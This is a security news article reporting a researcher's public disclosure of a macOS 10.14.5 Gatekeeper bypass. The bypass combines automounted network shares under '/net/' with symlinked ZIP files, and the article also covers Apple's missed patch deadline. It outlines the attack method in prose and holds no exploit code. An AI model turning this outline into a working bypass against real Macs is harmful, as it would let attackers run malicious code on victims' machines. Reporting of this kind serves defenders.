- The flaw could be exploited to bypass GateKeeper in macOS to execute malicious code.
- GateKeeper is a security mechanism created by Apple to make sure only verified applications run on Mac systems.
A serious security hole has been exposed in macOS that can allow attackers to execute harmful applications on Macs. The flaw was discovered by security researcher Filippo Cavallarin. According to Cavallarin, a security mechanism called GateKeeper in macOS treats both external drives and network shares as safe locations and can allow any application to run. Due to this, ZIP files containing malicious code can be executed.
Details in a glance
- GateKeeper’s faulty behavior was observed in macOS latest version 10.14.5. As of now, no patch is available to fix this behavior, but a workaround has been suggested by Cavallari in his blog.
- Cavallarin expressed that the behavior could be exploited with two legitimate features in macOS. The first feature was autofs/automount feature, which automatically allowed users to mount a network share by accessing any path starting with "/net/".
- The second feature was the way macOS handled ZIP files with symbolic links. macOS does not perform any security checks when decompressing ZIP files containing these links.
- As a result, attackers can craft ZIP files having symbolic links, which has malicious code that can be executed on the victim’s machine. A proof-of-concept(POC) exploit was also created by Cavallarin.
Apple fails to patch issue
Despite contacting Apple about this issue, Cavallarin said that the tech giant failed to fix GateKeeper. “The vendor has been contacted on February 22th 2019 and it's aware of this issue. This issue was supposed to be addressed, according to the vendor, on May 15th 2019 but Apple started dropping my emails. Since Apple is aware of my 90 days disclosure deadline, I make this information public,” told the security researcher.